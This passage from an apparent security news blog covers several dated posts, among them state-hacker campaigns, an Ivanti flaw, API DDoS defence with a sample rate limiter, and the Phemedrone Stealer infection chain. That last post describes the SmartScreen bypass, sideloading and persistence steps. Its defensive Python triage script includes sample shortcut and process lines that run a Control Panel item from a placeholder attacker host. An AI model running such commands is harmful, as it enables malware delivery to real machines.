Negatively, patching refers to the unauthorized modification of software or a system by taking advantage of system vulnerabilities. Cybercriminals can infiltrate or corrupt software pipelines, allowing them to send out malicious software patches to unsuspecting users. This works because many organizations place excessive trust in their automated software pipelines, or because users carelessly obtain software updates from unofficial sources.

SNIFFING 

Among those involved in network administration, sniffing is a legitimate process that entails the tracking and analysis of network traffic. This is done to undertake a troubleshooting task, monitor network performance, or facilitate network security-related actions. It is one of the vital actions in Intrusion Detection Systems (IDS).

However, sniffing can also refer to malicious packet sniffing, wherein an attacker intercepts the packets transmitted through a network. Sniffing allows bad actors to steal login credentials and other sensitive information. It can help them gain access to online accounts or steal crucial data. Sniffing is often used as a form of cyber attack on devices that connect to the internet through public WiFi networks. 

Sniffing in the negative context is not new; it has been used as an attack for decades. Cybersecurity advocates pointed out the threat of sniffing more than a decade ago amid the proliferation of businesses offering free public WiFi connections without strong security.

SCRIPTING 

Scripting refers to the writing and deployment of scripts for the automation of repetitive tasks. It is used to automate routine actions, which enables the efficient management of systems. Scripting is also employed in penetration testing to simulate cyber attacks on a system. Similarly, it is used in log analysis and monitoring, day-to-day security operations, forensics and incident response, and cross-platform compatibility testing.

However, scripting can also be malicious, as used by threat actors. Cybercriminals can turn to malicious scripting to automate the execution of files that have been successfully introduced into a system. Successfully deceiving a computer user into downloading a file is not enough for the malicious file to inflict damage. Scripts are necessary to unleash the effects of malicious files and detect security vulnerabilities.

BACKDOOR 

The term backdoor is usually known for its negative implication. Most news and articles refer to backdoors in an unfavorable context. This should not come as a surprise since backdoors are often used by cybercriminals. They serve as a way to bypass normal authentication for any computer-related system, facilitating unauthorized access or the introduction of malicious files to a computer or network.

However, a backdoor can also be a feature intentionally added to software. It can be deliberately put in an app to provide an optional means of access for cases when conventional access methods are unavailable. This “necessary” version of a backdoor was in the spotlight some years ago when the US FBI asked Apple to purposely build a backdoor into its iPhones.

KILL CHAIN

The cyber kill chain is a framework developed by Lockheed Martin as part of its patented Intelligence Driven Defense model for cyber attack identification and prevention. It consists of a series of steps that represent the different stages of a cyber attack, from early reconnaissance to command and control and “actions on objectives.” This model helps organizations visualize and comprehend the different stages of an attack, focusing on critical points in the attack, developing strategies to mitigate threats, and boosting incident response capabilities.

Essentially, the kill chain is a process that is supposed to help organizations prepare for cyber attacks, successfully fend off an assault, and mitigate problems that emerge in the wake of a cyber attack. However, the phrase kill chain, in colloquial use, may refer to a successful cyber attack.

AN EXERCISE IN CYBERSECURITY JARGON COMPLEXITY

It may sound confusing, but contronyms exist everywhere. Interestingly, these words still make sense despite the auto-contradiction. In cybersecurity, contronyms reflect the complexity and flexibility of language, showing how words can change in meaning depending on their context and usage.

Isn’t it counterintuitive for cybersecurity terms to bear contradictory meanings? Possibly. However, what is ultimately important is the understanding that cybersecurity terms are far from straightforward. It is a must to get properly acquainted with them to understand what they really mean, especially with the rise of a plethora of acronyms and jargon introduced by security solution providers, many of which tend to be marketing-speak or misnomers.

The Language of Cybersecurity


Tags: CONTRONYMS, The Language of Cybersecurity


Jan 23 2024

North Korean Hackers Weaponize Fake Research

Category: Backdoor,Hacking | disc7 @ 8:26 am

North Korean Hackers Weaponize Fake Research to Deliver RokRAT Backdoor

Media organizations and high-profile experts in North Korean affairs have been at the receiving end of a new campaign orchestrated by a threat actor known as ScarCruft in December 2023.

“ScarCruft has been experimenting with new infection chains, including the use of a technical threat research report as a decoy, likely targeting consumers of threat intelligence like cybersecurity professionals,” SentinelOne researchers Aleksandar Milenkoski and Tom Hegel said in a report shared with The Hacker News.

The North Korea-linked adversary, also known by the names APT37, InkySquid, RedEyes, Ricochet Chollima, and Ruby Sleet, is assessed to be part of the Ministry of State Security (MSS), setting it apart from Lazarus Group and Kimsuky, which are elements within the Reconnaissance General Bureau (RGB).

Earlier this week, North Korean state media reported that the country had carried out a test of its “underwater nuclear weapons system” in response to drills by the U.S., South Korea, and Japan, describing the exercises as a threat to its national security.

The latest attack chain observed by SentinelOne targeted an expert in North Korean affairs by posing as a member of the North Korea Research Institute, urging the recipient to open a ZIP archive file containing presentation materials.

While seven of the nine files in the archive are benign, two of them are malicious Windows shortcut (LNK) files, mirroring a multi-stage infection sequence previously disclosed by Check Point in May 2023 to distribute the RokRAT backdoor.

There is evidence to suggest that some of the individuals who were targeted around December 13, 2023, were also previously singled out a month prior on November 16, 2023.

SentinelOne said its investigation also uncovered malware – two LNK files (“inteligence.lnk” and “news.lnk”) as well as shellcode variants delivering RokRAT – that’s said to be part of the threat actor’s planning and testing processes.

While the former shortcut file just opens the legitimate Notepad application, the shellcode executed via news.lnk paves the way for the deployment of RokRAT, although this infection procedure is yet to be observed in the wild, indicating its likely use for future campaigns.

Both LNK files have been observed deploying the same decoy document, a legitimate threat intelligence report about the Kimsuky threat group published by South Korean cybersecurity company Genians in late October 2023, in a move that implies an attempt to expand its target list.

This has raised the possibility that the adversary could be looking to gather information that could help it refine its operational playbook and also target or mimic cybersecurity professionals to infiltrate specific targets via brand impersonation techniques.

The development is a sign that the nation-state hacking crew is actively tweaking its modus operandi in an apparent effort to circumvent detection in response to public disclosure about its tactics and techniques.

“ScarCruft remains committed to acquiring strategic intelligence and possibly intends to gain insights into non-public cyber threat intelligence and defense strategies,” the researchers said.

“This enables the adversary to gain a better understanding of how the international community perceives developments in North Korea, thereby contributing to North Korea’s decision-making processes.”

source: https://thehackernews.com/2024/01/north-korean-hackers-weaponize-fake.html

The Hacker and the State: Cyber Attacks and the New Normal of Geopolitics


Tags: RokRAT Backdoor, The Hacker and the State


Jan 22 2024

AI AND SECURITY: ARE THEY AIDING EACH OTHER OR CREATING MORE ISSUES? EXPLORING THE COMPLEX RELATIONSHIP IN TECHNOLOGY

Category: AI,cyber security | disc7 @ 12:13 pm

Artificial Intelligence (AI) has arisen as a wildly disruptive technology across many industries. As AI models continue to improve, more industries are sure to be disrupted and affected. One industry that is already feeling the effects of AI is digital security. The use of this new technology has opened up new avenues of protecting data, but it has also caused some concerns about its ethicality and effectiveness when compared with what we will refer to as traditional or established security practices.

This article will touch on the ways that this new tech is affecting already established practices, what new practices are arising, and whether or not they are safe and ethical.

HOW DOES AI AFFECT ALREADY ESTABLISHED SECURITY PRACTICES?

It is a fair statement to make that AI is still a nascent technology. Most experts agree that it is far from reaching its full potential, yet even so, it has still been able to disrupt many industries and practices. In terms of already established security practices, AI is providing operators with the opportunity to analyze huge amounts of data at incredible speed and with impressive accuracy. Identifying patterns and detecting anomalies is easy for AI to do, and incredibly useful for most traditional data security practices. 

Previously these systems would rely solely on human operators to perform the data analyses, which can prove time-consuming and would be prone to errors. Now, with AI help, human operators need only understand the refined data the AI is providing them and act on it.

IN WHAT WAYS CAN AI BE USED TO BOLSTER AND IMPROVE EXISTING SECURITY MEASURES?

AI can be used in several other ways to improve security measures. In terms of access protection, AI-driven facial recognition and other forms of biometric security can easily provide a relatively foolproof access protection solution. Using biometric access can eliminate passwords, which are often a weak link in data security.

AI’s ability to sort through large amounts of data means that it can be very effective in detecting and preventing cyber threats. An AI-supported network security program could, with relatively little oversight, analyze network traffic, identify vulnerabilities, and proactively defend against any incoming attacks. 

THE DIFFICULTIES IN UPDATING EXISTING SECURITY SYSTEMS WITH AI SOLUTIONS

The most pressing difficulty is that some old systems are simply not compatible with AI solutions. Security systems designed and built to be operated solely by humans are often not able to be retrofitted with AI algorithms, which means that any upgrades necessitate a complete, and likely expensive, overhaul of the security systems. 

One industry that has been quick to embrace AI-powered security systems is the online gambling industry. For those who are interested in seeing what AI-driven security can look like, visiting a casino online and investigating its security protocols will give you an idea of what is possible. Having an industry that was an early adopter of such a disruptive technology can help other industries learn what to do and what not to do. In many cases, online casinos staged entire overhauls of their security suites to incorporate AI solutions, rather than trying to combine new tech with older, non-compatible security technology.

Another important factor in the difficulty of incorporating AI systems is that it takes a very large amount of data to properly train an AI algorithm. Thankfully, other companies are doing this work, and it should be possible to buy an already trained AI, fit to purpose. All that remains is trusting that the trainers did their due diligence and that the AI will be effective.

EFFECTIVENESS OF AI-DRIVEN SECURITY SYSTEMS

AI-driven security systems are, for the most part, lauded as being effective. With faster threat detection and response times quicker than humanly possible, the advantage of using AI for data security is clear.

AI has also proven resilient in terms of adapting to new threats. AI has an inherent ability to learn, which means that as new threats are developed and new vulnerabilities emerge, a well-built AI will be able to learn and eventually respond to new threats just as effectively as old ones.

It has been suggested that AI systems will soon have to replace traditional data security solutions entirely. Part of the reason is not just their inherent effectiveness; there is also an anticipation that incoming threats will themselves be using AI. Better to fight fire with fire.

IS USING AI FOR SECURITY DANGEROUS?

The short answer is no, the long answer is no, but. The main concern when using AI security measures with little human input is that they could generate false positives or false negatives. AI is not infallible, and despite being able to process huge amounts of data, it can still get confused.

It could also be possible for the AI security system to itself be attacked and become a liability. If an attack were to target and inject malicious code into the AI system, it could see a breakdown in its effectiveness which would potentially allow multiple breaches.

The best remedy for both of these concerns is likely to ensure that there is still an alert human component to the security system. By ensuring that well-trained individuals are monitoring the AI systems, the dangers of false positives or attacks on the AI system are reduced greatly.

ARE THERE LEGITIMATE ETHICAL CONCERNS WHEN AI IS USED FOR SECURITY?

Yes. The main ethical concern relating to AI when used for security is that the algorithm could have an inherent bias. This can occur if the data used for the training of the AI is itself biased or incomplete in some way. 

Another important ethical concern is that AI security systems are known to sort through personal data to do their job, and if this data were to be accessed or misused, privacy rights would be compromised.

Many AI systems also lack transparency and accountability, which compounds the problem of the algorithm’s potential for bias. If an AI reaches conclusions whose reasoning a human operator cannot understand, the AI system must be held suspect.

CONCLUSION

AI could be a great boon to security systems and is likely an inevitable and necessary upgrade. The inability of human operators to combat AI threats alone seems to suggest its necessity. Coupled with its ability to analyze and sort through mountains of data and adapt to threats as they develop, AI has a bright future in the security industry.

However, AI-driven security systems must be overseen by trained human operators who understand the complexities and weaknesses that AI brings to their systems.

Must Learn AI Security

Artificial Intelligence (AI) Governance and Cyber-Security: A beginner’s handbook on securing and governing AI systems


Tags: AI security, Artificial Intelligence (AI) Governance, Must Learn AI Security


Jan 19 2024

New Microsoft Incident Response guides help security teams analyze suspicious activity

Category: Security Incident | disc7 @ 12:58 pm

“Today Microsoft Incident Response are proud to introduce two one-page guides to help security teams investigate suspicious activity in Microsoft 365 and Microsoft Entra. These guides contain the artifacts that Microsoft Incident Response hunts for and uses daily to provide our customers with evidence of Threat Actor activity in their tenant.”


Tags: Incident Response guide


Jan 19 2024

OSINVGPT – A Tool For Open-Source Investigations

Category: Security Tools | disc7 @ 12:12 pm

OSINVGPT is an AI-based system that helps security analysts with open-source investigations and tool selection. The tool was developed by “Very Simple Research.”

This tool can assist security analysts in gathering relevant information, sources, and tools for their investigations. It even helps researchers produce reports and summaries of their results. 

OSINVGPT is available on ChatGPT and is useful for security researchers as it saves both time and effort.

https://twitter.com/cyb_detective/status/1747654961201119559

Key Aspects

The key aspects that OSINVGPT covers are:

  • Data Analysis
  • Interpretation
  • Guidance on Methodology
  • Case Studies
  • Examples
  • Document Analysis
  • Fact-Checking
  • Verification
  • Recommendations Based on External Sources
  • Ethical Considerations

OSINVGPT’s data analysis and interpretation involve examining information from diverse open sources to form readable narratives and address specific queries. At the same time, guidance is offered on conducting transparent and accurate open-source investigations. 

Detailed insights and suggestions are provided using real-world examples within the knowledge base. Appropriate data is analyzed and extracted from the uploaded documents for open-source investigations. 

To ensure investigation accuracy, assistance is given in fact-checking using open-source data. Recommendations based on external sources are provided for queries beyond the direct knowledge base, with a focus on ethical considerations in open-source investigations for responsible conduct.

Moreover, if you want, you can access the OSINVGPT tool from here for open-source investigation.

Related articles on Security Tools

Open Source Intelligence Methods and Tools: A Practical Guide to Online Intelligence

Practical Threat Intelligence and Data-Driven Threat Hunting: A hands-on guide to threat hunting with the ATT&CK™ Framework and open source tools


Tags: Open source, OSINVGPT


Jan 19 2024

CISA: Critical Ivanti auth bypass bug now actively exploited

Category: CISA | disc7 @ 7:03 am
https://www.bleepingcomputer.com/news/security/cisa-critical-ivanti-auth-bypass-bug-now-actively-exploited/

CISA warns that a critical authentication bypass vulnerability in Ivanti’s Endpoint Manager Mobile (EPMM) and MobileIron Core device management software (patched in August 2023) is now under active exploitation.

Tracked as CVE-2023-35082, the flaw is a remote unauthenticated API access vulnerability affecting all versions of EPMM 11.10, 11.9, and 11.8, and MobileIron Core 11.7 and below.

Successful exploitation provides attackers access to personally identifiable information (PII) of mobile device users and can let them backdoor compromised servers when chaining the bug with other flaws.

“Ivanti has an RPM script available now. We recommend customers first upgrade to a supported version and then apply the RPM script,” the company said in August. “More detailed information can be found in this Knowledge Base article on the Ivanti Community portal.”

Cybersecurity company Rapid7, which discovered and reported the vulnerability, provides indicators of compromise (IOCs) to help admins detect signs of a CVE-2023-35082 attack.

According to Shodan, 6,300 Ivanti EPMM user portals are currently exposed online, while the Shadowserver threat monitoring platform tracks 3,420 Internet-exposed EPMM appliances.

Shodan’s data also reveals that more than 150 instances linked to government agencies worldwide can be directly accessed via the Internet.

Internet-exposed Ivanti EPMM user portals (Shodan)

While it has yet to provide further details on CVE-2023-35082 active exploitation, CISA added the vulnerability to its Known Exploited Vulnerabilities Catalog based on evidence of active exploitation and says there’s no evidence of abuse in ransomware attacks.

The cybersecurity agency also ordered U.S. federal agencies to patch it by February 2, as required by a binding operational directive (BOD 22-01) issued three years ago.

Ivanti has yet to update its August advisories or issue another notification warning that attackers are using this security vulnerability in the wild.

Two other Ivanti Connect Secure (ICS) zero-days, an auth bypass (CVE-2023-46805) and a command injection (CVE-2024-21887), are now also under mass exploitation by multiple threat groups, starting January 11.

Victims compromised so far range from small businesses to multiple Fortune 500 companies from various industry sectors, with the attackers having already backdoored over 1,700 ICS VPN appliances using a GIFTEDVISITOR webshell variant.

Multiple other Ivanti zero-days (i.e., CVE-2021-22893, CVE-2023-35078, CVE-2023-35081, CVE-2023-38035) have been exploited in recent years to breach dozens of government, defense, and financial organizations across the United States and Europe, several Norwegian government organizations, as well as in targeted attacks.

Antivirus Bypass Techniques


Tags: Antivirus Bypass Techniques, Ivanti auth bypass bug


Jan 18 2024

How Do You Protect Your APIs From DDoS Attacks?

Category: API security,Information Security | disc7 @ 8:22 am

Today, DDoS attacks stand out as the most widespread cyber threat, extending their impact to APIs. 

When successfully executed, these attacks can cripple a system, presenting a more severe consequence than DDoS incidents targeting web applications. 

The increased risk amplifies the potential for reputational damage to the company associated with the affected APIs.

How Does DDoS Affect Your APIs?

A DDoS attack on an API involves overwhelming the targeted API with a flood of traffic from multiple sources, disrupting its normal functioning and causing it to become unavailable to legitimate users.

This attack can be particularly damaging as APIs play a crucial role in enabling communication between different software applications, and disruption can impact the overall functionality of interconnected systems.

The impact of DDoS attacks is particularly severe for businesses and organizations that depend on their APIs to deliver essential services to customers. These attacks, employing methods such as UDP floods, SYN floods, HTTP floods, and others, pose a significant threat.

Typically orchestrated through botnets—networks of compromised devices under the control of a single attacker—DDoS attacks can cripple a target’s functionality.

DDoS attacks on APIs target the server and every part of your API service. But how do attackers manage to mount DDoS attacks against APIs?

This Webinar on API attack simulation shows an example of a DDoS attack on APIs and how WAAP can protect the API endpoints. 

Several factors can make APIs vulnerable to DDoS attacks:

Absent or insufficient rate limiting: If an API lacks robust rate-limiting mechanisms, attackers can exploit this weakness by sending a massive volume of requests in a short period, overwhelming the system’s capacity to handle them.

Inadequate Authentication and Authorization: Weak or compromised authentication measures can allow malicious actors to gain unauthorized access to an API. Once inside, they may misuse the API by flooding it with requests, leading to a DDoS scenario.

Insufficient Monitoring and Anomaly Detection: Ineffective monitoring and anomaly detection systems can make identifying abnormal traffic patterns associated with a DDoS attack challenging. Prompt detection is crucial for implementing mitigation measures.

Scalability Issues: APIs that cannot scale dynamically in response to increased traffic may become targets for DDoS attacks. A sudden surge in requests can overload the system if it cannot scale its resources efficiently.

How Do WAAP Solutions Protect Against DDoS Attacks on API?

A Web Application and API Protection (WAAP) platform offers in-line blocking for all layer-seven traffic, comprehensively securing web applications and APIs.

To guarantee robust security, WAFs incorporated into WAAP solutions provide immediate defense by filtering, monitoring, detecting, and automatically blocking malicious traffic, thereby preventing its access to the server.

Active monitoring of traffic on an API endpoint enables the identification of abnormal traffic patterns commonly linked to DDoS attacks. Instances of sudden spikes in traffic volume serve as red flags for potential attacks, and a proficient monitoring system can promptly detect and address such increases.

In addition, WAAP enforces rate limits by assessing the number of requests from an IP address. API rate limiting is critical in mitigating DDoS damage and reducing calls, data volume, and types. Setting limits aligned with API capacity and user needs enhances security and improves the user experience. 

To avoid impacting genuine users, find solutions that use behavioral analysis technologies to establish a baseline for rate limiting.

AppTrana WAAP’s DDoS mitigation employs adaptive behavioral analysis for comprehensive defense, detecting and mitigating various DDoS attacks with a layered approach. It distinguishes between “flash crowds” and real DDoS attacks, using real-time behavioral analysis for precise mitigation. This enhances accuracy compared to static rate limit-based systems.
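As an added illustration of the rate-limiting and behavioral-baseline defenses described above (example code written for this post, not AppTrana’s or any WAAP vendor’s implementation), the Python below first learns a per-window request limit from a constructed sample of normal client traffic and then enforces it per client with a sliding window. The client names, request rates, the 3x-of-p95 multiplier and the floor of 10 are all constructed assumptions for the demonstration; timestamps are integer milliseconds so the arithmetic is exact.

```python
"""Per-client sliding-window rate limiting with a limit learned from normal traffic.

Constructed example for this post, not a vendor's code. Timestamps are integer
milliseconds; client names, rates and thresholds are assumptions for the demo.
"""
import math
import statistics
from collections import defaultdict, deque


class SlidingWindowLimiter:
    """Accept at most `limit` requests per client within any `window_ms` window."""

    def __init__(self, limit: int, window_ms: int):
        self.limit = limit
        self.window_ms = window_ms
        # client_id -> timestamps (ms) of recently accepted requests
        self._hits = defaultdict(deque)

    def allow(self, client_id: str, now_ms: int) -> bool:
        q = self._hits[client_id]
        # Forget accepted requests that have aged out of the window.
        while q and q[0] <= now_ms - self.window_ms:
            q.popleft()
        if len(q) >= self.limit:
            return False  # a gateway would answer HTTP 429 here
        q.append(now_ms)
        return True


def learn_baseline(samples, window_ms: int, multiplier: float = 3.0, floor: int = 10) -> int:
    """Derive a per-window limit from (client_id, ms) pairs of observed normal traffic.

    The limit is `multiplier` times the 95th percentile of per-client, per-window
    request counts, never below `floor`, so ordinary bursts pass and floods do not.
    """
    counts = defaultdict(int)
    for client_id, ts in samples:
        counts[(client_id, ts // window_ms)] += 1
    per_window = list(counts.values())
    if len(per_window) < 2:
        p95 = max(per_window, default=0)
    else:
        p95 = statistics.quantiles(per_window, n=20)[-1]  # 95th percentile
    return max(floor, math.ceil(multiplier * p95))


def simulate(limiter: SlidingWindowLimiter, traffic):
    """Feed (client_id, ms) requests in time order; return {client: (accepted, rejected)}."""
    result = defaultdict(lambda: [0, 0])
    for client_id, ts in sorted(traffic, key=lambda r: r[1]):
        result[client_id][0 if limiter.allow(client_id, ts) else 1] += 1
    return {c: tuple(v) for c, v in result.items()}


def normal_traffic(clients=("user-1", "user-2", "user-3"), rps=4, seconds=10):
    """Constructed baseline: each client sends `rps` evenly spaced requests per second."""
    step = 1000 // rps
    return [(c, i * step) for c in clients for i in range(rps * seconds)]


def flood_traffic(client="flood", rps=200, seconds=10):
    """Constructed flood: a single source sends `rps` requests per second."""
    step = 1000 // rps
    return [(client, i * step) for i in range(rps * seconds)]


def run_demo():
    """Learn the limit from normal traffic, then replay normal traffic plus a flood."""
    window_ms = 1000
    limit = learn_baseline(normal_traffic(), window_ms)  # 12 for the constructed data
    limiter = SlidingWindowLimiter(limit, window_ms)
    return limit, simulate(limiter, normal_traffic() + flood_traffic())


if __name__ == "__main__":
    learned, outcome = run_demo()
    print(f"learned limit: {learned} requests per second")
    for client, (ok, rejected) in outcome.items():
        print(f"{client:8s} accepted={ok:5d} rejected={rejected:5d}")
```

With the constructed data the learned limit is 12 requests per second: the three ordinary clients (4 requests per second each) are never throttled, while the flood source, which sends 200 requests per second, gets only 12 through per second and has the other 1,880 of its 2,000 requests rejected. The generous multiplier is what lets a “flash crowd” of many ordinary clients through, since each of them is judged against its own window rather than against aggregate volume; a single-source flood, by contrast, hits the cap immediately.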

Advanced API Security: OAuth 2.0 and Beyond

API Security in Action


Tags: API Security


Jan 18 2024

HOW TO EXPLOIT WINDOWS DEFENDER ANTIVIRUS TO INFECT A DEVICE WITH MALWARE

Category: Antivirus,Malware | disc7 @ 8:10 am

Trend Micro’s recent threat hunting efforts have uncovered active exploitation of CVE-2023-36025, a vulnerability in Microsoft Windows Defender SmartScreen, by a new strain of malware known as Phemedrone Stealer. This malware targets web browsers, cryptocurrency wallets, and messaging apps like Telegram, Steam, and Discord, stealing data and sending it to attackers via Telegram or command-and-control servers. Phemedrone Stealer, an open-source stealer written in C#, is actively maintained on GitHub and Telegram.

CVE-2023-36025 arises from insufficient checks on Internet Shortcut (.url) files, allowing attackers to bypass Windows Defender SmartScreen warnings by using crafted .url files that download and execute malicious scripts. Microsoft patched this vulnerability on November 14, 2023, but its exploitation in the wild led to its inclusion in the Cybersecurity and Infrastructure Security Agency’s Known Exploited Vulnerabilities list. Various malware campaigns, including those distributing Phemedrone Stealer, have since incorporated this vulnerability.

INITIAL ACCESS VIA CLOUD-HOSTED MALICIOUS URLS

According to the report, initial access relies on malicious, cloud-hosted URLs. Attackers host malicious Internet Shortcut files on platforms such as Discord or other cloud services, often disguising the links with URL shorteners. Unsuspecting users who open these files trigger the exploitation of CVE-2023-36025.

DEFENSE EVASION TACTICS

The malicious .url file downloads and executes a control panel item (.cpl) file from an attacker-controlled server. This bypasses the usual security prompt from Windows Defender SmartScreen. The malware employs MITRE ATT&CK technique T1218.002, using the Windows Control Panel process binary to execute .cpl files, which are essentially DLL files.

  1. Initial Infection via Malicious .url File (CVE-2023-36025): The attack begins when a user executes a malicious Internet Shortcut (.url) file. This file is designed to bypass Microsoft Windows Defender SmartScreen warnings, typically triggered for files from untrusted sources. The evasion is likely achieved by manipulating the file’s structure or content, making it appear benign.
  2. Execution of a Control Panel Item (.cpl) File: Once executed, the .url file connects to an attacker-controlled server to download a .cpl file. In Windows, .cpl files are used to execute Control Panel items and are essentially Dynamic Link Libraries (DLLs). This step involves the MITRE ATT&CK technique T1218.002, which exploits the Windows Control Panel process binary (control.exe) to execute .cpl files.
  3. Use of rundll32.exe for DLL Execution: The .cpl file, when executed through control.exe, then calls rundll32.exe, a legitimate Windows utility used to run functions stored in DLL files. This step is critical as it uses a trusted Windows process to execute the malicious DLL, further evading detection.
  4. PowerShell Utilization for Payload Download and Execution: The malicious DLL acts as a loader to call Windows PowerShell, a task automation framework. PowerShell is then used to download and execute the next stage of the attack from GitHub.
  5. Execution of DATA3.txt PowerShell Loader: The file DATA3.txt, hosted on GitHub, is an obfuscated PowerShell script designed to be difficult to analyze statically (i.e., without executing it). It uses string and digit manipulation to mask its true intent.
  6. Deobfuscation and Execution of the GitHub-Hosted Loader: Through a combination of static and dynamic analysis, the obfuscated PowerShell commands within DATA3.txt can be deobfuscated. This script is responsible for downloading a ZIP file from the same GitHub repository.
  7. Contents of the Downloaded ZIP File:
    • WerFaultSecure.exe: A legitimate Windows Fault Reporting binary.
    • Wer.dll: A malicious binary that is sideloaded (executed in the context of a legitimate process) when WerFaultSecure.exe is run.
    • Secure.pdf: An RC4-encrypted second-stage loader, presumably containing further malicious code.

This attack is sophisticated, using multiple layers of evasion and leveraging legitimate Windows processes and binaries to conceal malicious activities. The use of GitHub as a hosting platform for malicious payloads is also noteworthy, as it can lend an appearance of legitimacy and may bypass some network-based security controls.

PERSISTENCE AND DLL SIDELOADING

The malware achieves persistence by creating scheduled tasks and uses DLL sideloading techniques. The malicious DLL, crucial for the loader’s functionality, decrypts and runs the second stage loader. It uses dynamic API resolving and XOR-based algorithms for string decryption, complicating reverse engineering efforts.

  1. Malicious DLL (wer.dll) Functionality: It decrypts and runs a second-stage loader. To avoid detection and hinder reverse engineering, it employs API hashing, string encryption, and is protected by VMProtect.
  2. DLL Sideloading Technique: The malware deceives the system into loading the malicious wer.dll by placing it in the application directory, a method that exploits the trust Windows has in its own directories.
  3. Dynamic API Resolving: To avoid detection by static analysis tools, the malware uses CRC-32 hashing for storing API names, importing them dynamically during runtime.
  4. XOR-based String Decryption: An algorithm is used to decrypt strings, with each byte’s key generated based on its position. This method is designed to complicate automated decryption efforts.
  5. Persistence Mechanism: The malware creates a scheduled task to regularly execute WerFaultSecure.exe. This ensures that the malware remains active on the infected system.
  6. Second-Stage Loader (secure.pdf): It’s decrypted using an undocumented function from advapi32.dll, with memory allocation and modification handled by functions from Activeds.dll and VirtualProtect.
  7. Execution Redirection through API Callbacks: The malware cleverly redirects execution flow to the second-stage payload using Windows API callback functions, particularly exploiting the CryptCATCDFOpen function.

Overall, this malware demonstrates a deep understanding of Windows internals, using them to its advantage to stay hidden and maintain persistence on the infected system. The combination of techniques used makes it a complex and dangerous threat.
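The two lists above describe points a defender can check for directly. The following Python triage script is an added example (not from Trend Micro's report or the Phemedrone code): it parses an Internet Shortcut (.url) file for a target that launches a remote Control Panel item, and walks process-creation events for the control.exe to rundll32.exe to powershell.exe lineage plus a scheduled task that runs WerFaultSecure.exe from outside the Windows directory. The host name attacker.example, the task name, the file paths and the event records are constructed placeholders.

```python
"""Defender-side triage for the Phemedrone-style chain (constructed example)."""
import configparser
import ntpath
import posixpath
import re
from urllib.parse import urlparse

# File types a .url shortcut has no legitimate reason to launch directly.
EXECUTABLE_EXTENSIONS = {".cpl", ".dll", ".exe", ".hta", ".js", ".vbs", ".ps1", ".scr"}

# Constructed .url contents: the first mimics the CVE-2023-36025 abuse pattern
# (shortcut target is a Control Panel item on a remote share), the second is benign.
SUSPICIOUS_URL_FILE = """[InternetShortcut]
URL=file://attacker.example/share/item.cpl
IconIndex=0
"""
BENIGN_URL_FILE = """[InternetShortcut]
URL=https://www.example.com/docs/report.html
"""

# Constructed process-creation events (pid, parent pid, image path, command line).
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 210, "ppid": 100, "image": r"C:\Windows\System32\control.exe",
     "cmdline": r"control.exe \\attacker.example\share\item.cpl"},
    {"pid": 220, "ppid": 210, "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe \\attacker.example\share\item.cpl"},
    {"pid": 230, "ppid": 220, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -c <download of DATA3.txt>"},
    {"pid": 240, "ppid": 230, "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks.exe /create /sc minute /mo 90 /tn Updater /tr "C:\Users\Public\WerFaultSecure.exe"'},
    {"pid": 300, "ppid": 100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe Get-Date"},  # benign: launched straight from explorer
]

TASK_TARGET = re.compile(r'/tr\s+"?([^"\s]*werfaultsecure\.exe)', re.IGNORECASE)
WINDOWS_DIR = "c:\\windows\\"


def inspect_url_shortcut(text: str) -> list[str]:
    """Return the reasons a .url file looks malicious; an empty list means clean."""
    parser = configparser.ConfigParser(interpolation=None)
    parser.read_string(text)
    if not parser.has_section("InternetShortcut"):
        return ["missing [InternetShortcut] section"]
    target = parser.get("InternetShortcut", "URL", fallback="")
    # Normalise UNC paths (\\host\share\x) so urlparse sees them as //host/share/x.
    parsed = urlparse(target.replace("\\", "/"))
    reasons = []
    if parsed.scheme in ("", "file") and parsed.netloc:
        reasons.append(f"target is on a remote file share: {parsed.netloc}")
    ext = posixpath.splitext(parsed.path)[1].lower()
    if ext in EXECUTABLE_EXTENSIONS:
        reasons.append(f"target launches executable content ({ext})")
    return reasons


def _ancestry(event: dict, by_pid: dict) -> list[str]:
    """Image names of the parent, grandparent, ... up to the root we know about."""
    names, cur, hops = [], by_pid.get(event["ppid"]), 0
    while cur is not None and hops < 16:  # hop cap guards against pid-reuse loops
        names.append(ntpath.basename(cur["image"]).lower())
        cur = by_pid.get(cur["ppid"])
        hops += 1
    return names


def find_suspicious_chains(events: list[dict]) -> list[str]:
    """Flag the T1218.002 lineage and WerFaultSecure.exe persistence outside the Windows directory."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        name = ntpath.basename(e["image"]).lower()
        if name == "powershell.exe":
            lineage = _ancestry(e, by_pid)
            if "rundll32.exe" in lineage and "control.exe" in lineage:
                alerts.append(f"pid {e['pid']}: powershell.exe descends from control.exe -> rundll32.exe")
        elif name == "schtasks.exe" and "/create" in e["cmdline"].lower():
            m = TASK_TARGET.search(e["cmdline"])
            if m and not m.group(1).lower().startswith(WINDOWS_DIR):
                alerts.append(f"pid {e['pid']}: scheduled task runs WerFaultSecure.exe from "
                              f"{m.group(1)} (sideloading location)")
    return alerts


if __name__ == "__main__":
    print(inspect_url_shortcut(SUSPICIOUS_URL_FILE))
    for alert in find_suspicious_chains(SAMPLE_EVENTS):
        print(alert)
```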

SECOND-STAGE DEFENSE EVASION

The second-stage loader, known as Donut, is an open-source shellcode that executes various file types in memory. It encrypts payloads without compression and uses the Unmanaged CLR Hosting API to load the Common Language Runtime, creating a new Application Domain for running assemblies. Here’s an overview of how Donut is used for defense evasion and payload execution:

  1. Donut Shellcode Loader:
    • Capabilities: Allows execution of VBScript, JScript, EXE files, DLL files, and .NET assemblies directly in memory.
    • Deployment Options: Can be embedded into the loader or staged from an HTTP or DNS server. In this case, it’s embedded directly into the loader.
  2. Payload Compression and Encryption:
    • Compression Techniques: Supports aPLib, LZNT1, Xpress, and Xpress Huffman through RtlCompressBuffer.
    • Encryption: Uses the Chaskey block cipher for payload encryption. In this instance, only encryption is used, without compression.
  3. Execution Process via Unmanaged CLR Hosting API:
    • CLR Loading: Donut configures to use the Unmanaged CLR Hosting API to load the Common Language Runtime (CLR) into the host process.
